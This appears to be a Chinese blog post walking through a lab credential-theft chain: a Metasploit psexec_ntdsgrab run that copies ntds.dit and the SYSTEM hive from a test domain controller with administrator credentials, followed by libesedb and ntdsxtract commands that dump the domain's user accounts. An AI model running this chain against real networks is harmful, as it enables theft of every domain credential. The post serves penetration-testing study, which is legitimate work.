metasploit - psexec_ntdsgrab / libesedb / ntdsxtract

最新推荐文章于 2022-03-05 11:23:20 发布
最新推荐文章于 2022-03-05 11:23:20 发布
阅读量2.3k 收藏
点赞数
分类专栏: Metasploit Pentesting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/48376195
版权

psexec_ntdsgrab

msf auxiliary(psexec_ntdsgrab) > show options 

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CREATE_NEW_VSC        false            no        If true, attempts to create a volume shadow copy
   RHOST                 192.168.10.32    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             PENTEST.COM      no        The Windows domain to use for authentication
   SMBPass               pass1234PASS~    no        The password for the specified username
   SMBSHARE              C$               yes       The name of a writeable share on the server
   SMBUser               administrator    no        The username to authenticate as
   VSCPATH                                no        The path to the target Volume Shadow Copy
   WINPATH               Windows          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf auxiliary(psexec_ntdsgrab) > run

[*] 192.168.10.32:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Checking if NTDS.dit was copied.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Downloading ntds.dit file
[+] 192.168.10.32:445 - ntds.dit stored at /home/notfound/.msf4/loot/20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
[*] 192.168.10.32:445 - Downloading SYSTEM hive file
[+] 192.168.10.32:445 - SYSTEM hive stored at /home/notfound/.msf4/loot/20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
[*] 192.168.10.32:445 - Executing cleanup...
[*] 192.168.10.32:445 - Cleanup was successful
[*] Auxiliary module execution completed

Install libesedb

root:/ /# uname -a
Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux
root:/tmp/ntds /# wget --no-check-certificate https://github.com/libyal/libesedb/archive/20150409.zip
root:/tmp/ntds /# unzip -x 20150409.zip
root:/tmp/ntds /# cd libesedb-20150409/
root:/tmp/ntds /# ./synclibs.sh
root:/tmp/ntds /# git config --global http.sslverify false
root:/tmp/ntds /# ./autogen.sh
root:/tmp/ntds /# ./configure
root:/tmp/ntds /# make
root:/tmp/ntds /# make install
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit 
esedbexport: error while loading shared libraries: libesedb.so.1: cannot open shared object file: No such file or directory
root:/tmp/ntds /# ldconfig
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit 
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag1) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
root:/tmp/ntds/ntds_demo /# ls -l
total 33572
-rw-r--r-- 1 root root 12599296 Sep 12 12:48 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
-rw-r--r-- 1 root root  9773056 Sep 12 12:35 20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
-rw-r--r-- 1 root root     1104 Sep 12 12:50 backlinks.map
-rw-r--r-- 1 root root    72779 Sep 12 12:50 childsrid.map
-rw-r--r-- 1 root root 11021285 Sep 12 12:39 datatable.3
-rw-r--r-- 1 root root      613 Sep 12 12:39 hiddentable.4
-rw-r--r-- 1 root root    42735 Sep 12 12:50 lidrid.map
-rw-r--r-- 1 root root     1013 Sep 12 12:50 links.map
-rw-r--r-- 1 root root     5777 Sep 12 12:39 link_table.5
-rw-r--r-- 1 root root       57 Sep 12 12:39 MSysDefrag1.9
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjects.0
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjectsShadow.1
-rw-r--r-- 1 root root      103 Sep 12 12:38 MSysUnicodeFixupVer2.2
drwxr-xr-x 5 root root     4096 Sep 12 12:44 ntdsxtract
-rw-r--r-- 1 root root    57725 Sep 12 12:50 offlid.map
-rw-r--r-- 1 root root      152 Sep 12 12:50 pek.map
-rw-r--r-- 1 root root       80 Sep 12 12:39 quota_rebuild_progress_table.11
-rw-r--r-- 1 root root      771 Sep 12 12:39 quota_table.10
-rw-r--r-- 1 root root   180963 Sep 12 12:50 ridguid.map
-rw-r--r-- 1 root root    75646 Sep 12 12:50 ridname.map
-rw-r--r-- 1 root root     3583 Sep 12 12:50 ridsid.map
-rw-r--r-- 1 root root    23677 Sep 12 12:50 ridtype.map
-rw-r--r-- 1 root root       14 Sep 12 12:39 sdpropcounttable.6
-rw-r--r-- 1 root root       96 Sep 12 12:39 sdproptable.7
-rw-r--r-- 1 root root   182041 Sep 12 12:39 sd_table.8
-rw-r--r-- 1 root root    50885 Sep 12 12:50 typeidname.map
-rw-r--r-- 1 root root    67338 Sep 12 12:50 typerid.map
root:/tmp/ntds/ntds_demo /#

NTDSXTRACT

root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dscomputers.py datatable.3 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsgroups.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsfileinformation.py 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./

[+] Started at: Sat, 12 Sep 2015 04:49:55 UTC
[+] Started with options:
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 3458 records processed
[+] Sanity checks...
      Schema record id: 1774
      Schema type id: 10
[+] Extracting schema information - 100% -> 1517 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/links.map'
[+] Rebuilding maps...
[+] Extracting object links...

List of users:
==============
Record ID:            3510
User name:            Administrator
User principal name:  
SAM Account name:     Administrator
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 6b36f08b-c8cf-4eab-9e18-ae1bdce0e4f6
SID:                  S-1-5-21-495298362-4107897003-3932503283-500
When created:         2015-04-11 10:08:32+00:00
When changed:         2015-09-11 17:15:30+00:00
Account expires:      Never
Password last set:    2015-09-11 17:15:30.234375+00:00
Last logon:           2015-09-11 17:15:59.890625+00:00
Last logon timestamp: 2015-09-11 17:15:30.218750+00:00
Bad password time     2015-04-11 13:34:02.937500+00:00
Logon count:          19
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Administrator

Record ID:            3511
User name:            Guest
User principal name:  
SAM Account name:     Guest
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 5d3b8bbf-5d0a-4573-96fa-ecdf0d68b2b9
SID:                  S-1-5-21-495298362-4107897003-3932503283-501
When created:         2015-04-11 10:08:32+00:00
When changed:         2015-04-11 10:08:32+00:00
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    PWD_NOTREQD
    NORMAL_ACCOUNT
    DONT_EXPIRE_PASSWORD
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Guest

Record ID:            3557
User name:            krbtgt
User principal name:  
SAM Account name:     krbtgt
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 d4a001b1-1d6f-4033-8396-5b50ed442416
SID:                  S-1-5-21-495298362-4107897003-3932503283-502
When created:         2015-04-11 10:21:27+00:00
When changed:         2015-04-11 10:36:38+00:00
Account expires:      Never
Password last set:    2015-04-11 10:21:27.750000+00:00
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, krbtgt

Record ID:            3717
User name:            python
User principal name:  
SAM Account name:     python
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 37218973-1887-4768-a98b-c9c797769ebc
SID:                  S-1-5-21-495298362-4107897003-3932503283-1111
When created:         2015-04-11 10:40:57+00:00
When changed:         2015-04-11 10:42:50+00:00
Account expires:      Never
Password last set:    2015-04-11 10:40:57.406250+00:00
Last logon:           2015-04-11 11:27:15.796875+00:00
Last logon timestamp: 2015-04-11 10:42:50.531250+00:00
Bad password time     2015-04-11 11:26:15.359375+00:00
Logon count:          36
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, python

Record ID:            3720
User name:            juzi
User principal name:  
SAM Account name:     juzi
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 b29311a1-595a-4a8c-a292-2f623ad2969b
SID:                  S-1-5-21-495298362-4107897003-3932503283-1114
When created:         2015-04-11 10:42:09+00:00
When changed:         2015-04-11 10:47:14+00:00
Account expires:      Never
Password last set:    2015-04-11 10:42:09.375000+00:00
Last logon:           2015-04-11 11:50:41.937500+00:00
Last logon timestamp: 2015-04-11 10:47:14.015625+00:00
Bad password time     2015-04-11 10:54:08.187500+00:00
Logon count:          7
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, juzi

Record ID:            3722
User name:            jin
User principal name:  
SAM Account name:     jin
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 23b53357-d35c-4586-a239-cd930497bf7a
SID:                  S-1-5-21-495298362-4107897003-3932503283-1116
When created:         2015-04-11 10:46:32+00:00
When changed:         2015-04-11 10:49:45+00:00
Account expires:      Never
Password last set:    2015-04-11 10:46:32.250000+00:00
Last logon:           2015-04-11 10:49:49+00:00
Last logon timestamp: 2015-04-11 10:49:45.875000+00:00
Bad password time     Never
Logon count:          5
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, jin

Record ID:            3726
User name:            debug
User principal name:  
SAM Account name:     debug
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 114da9cb-7770-4ec8-b2b1-03b2505521db
SID:                  S-1-5-21-495298362-4107897003-3932503283-1119
When created:         2015-04-11 10:56:04+00:00
When changed:         2015-04-11 10:58:13+00:00
Account expires:      Never
Password last set:    2015-04-11 10:56:04.515625+00:00
Last logon:           2015-04-11 17:17:21.250000+00:00
Last logon timestamp: 2015-04-11 10:58:13+00:00
Bad password time     Never
Logon count:          95
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, debug

References

http://www.ntdsxtract.com/
https://github.com/libyal/libesedb/

Nixawk
关注
专栏目录
导出ntds.dit中的散列值
weixin_41082546的博客
02-15 374
1.下载NTDSX http://www.ntdsxtract.com git clonehttps://github.com/csababarta/ntdsxtract 安装 python setup.py build && python setup.py install 将导出的ntds.dit.export 文件夹中的datatable.3和link_table....
[-] Failed to load plugin from /usr/share/metasploit-framework/plugins/db_autopwn: No classes were l...
weixin_33699914的博客
11-05 942
 问题详情   然后,执行,出现如下问题,则说明大家的这个文件,下载不是完整的或者你上传不完整。 msf > load db_autopwn [-] Failed to load plugin from /usr/share/metasploit-framework/plugins/db_autopwn: No classes were l...
使用NTDSXtract离线抓取Domain Hash
weixin_30889885的博客
06-05 83
下载NTDSX http://www.ntdsxtract.com/ 下载libesedb http://code.google.com/p/libesedb/ 获得ntds.dit和SYSTEM文件: 2008和2012的域控用ntdsutil命令,网上有。 2008以下的域控,创建磁盘的shadow copy,然后拷贝ntds.dit和system。 有两个工具可共选择:Vs...
Metasploit PsExec模块
iteye_16188的博客
11-25 374
参考:https://rapid7-community.hosted.jivesoftware.com/community/metasploit/blog/authors/thelightcosine http://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh exploit/windows/smb/psexec_ps...
metasploit-framework_6.1.2+20210821102555_1rapid7-1_amd64.deb
08-22
我希望能方便到你 网站原地址:https://apt.metasploit.com/ k
from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.17.1/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
最新发布
02-09
`from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.17.1/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'` 是一个错误信息的堆栈跟踪(stack trace),它指示了在执行...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/activerecord-7.0.4.2/lib/active_record/connection_adapters/postgresql_adapter.rb:81:in `rescue in new_client': We could not find your database: msf. Which can be found in the database configuration file located at config/database.yml. (ActiveRecord::NoDatabaseError)
07-20
你遇到了一个错误,提示无法找到名为"msf"的数据库。这个问题通常是由于缺少数据库配置文件或配置文件中的错误导致的。请确保你已经正确配置了数据库,并且配置文件中包含了正确的数据库名称。 ...
Eternalblue-Doublepulsar-Metasploit:利用漏洞Eternalblue-Doublepulsar的Metasploit模块
05-02
永恒的蓝色-双脉冲星-元宝 本软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,...
libesedb解析IE的cookies相关dat文件
03-17
libesedb主要用于读取IE的cookies相关dat文件,仅供参考。 # Visual C++ Express 2008 打开路径libesedb-master\msvscpp\libesedb.sln
kali linux权限维持,msfconsole权限维持
weixin_42297742的博客
04-29 434
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
域hash值破解的总结经验
渗透测试研究中心
04-29 532
域hash值破解的总结经验
nginx启动报错处理方法 error while loading shared libraries:libpcre.so.1:cannot open shared object file:No su
wwzzh1989的博客
03-05 6611
启动nginx报错:error while loading shared libraries:libpcre.so.1:cannot open shared object file:No such file or directory 先查找到文件:find / -name “libpcre.so.1” 找到该目录后,把路径放到 /etc/ld.so.conf 这样路径就被包含到库文件的路径当中了 然后执行:ldconfig让修改生效。 操作:echo “/usr/local/lib” >> /e
error while loading shared libraries: libnsl.so.1: cannot open shared object file: No such
一个骚年的博客
11-06 1万+
error while loading shared libraries: libnsl.so.1: cannot open shared object file: No such 一般这个错误就是依赖包没装完,执行以下安装即可 yum install libnsl.x86_64
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
一个完整的内网渗透是什么样子的
kali_Ma的博客
08-12 3946
0x00 前言 今天这篇文章将试图呈现一个完整的内网渗透过程。文章略长,如果感兴趣的话,请耐心阅读! 0x01 案例分析 实验环境: 目标环境:10.0.0.0/24, 10.0.1.0/24 攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Windows) 渗透过程: 基本的主机探测: root@kali:~# nmap -sn 10.0.0.0/24 -oG online.txt root@kali:~# cat online.txt | grep -i up Host:
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4424
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值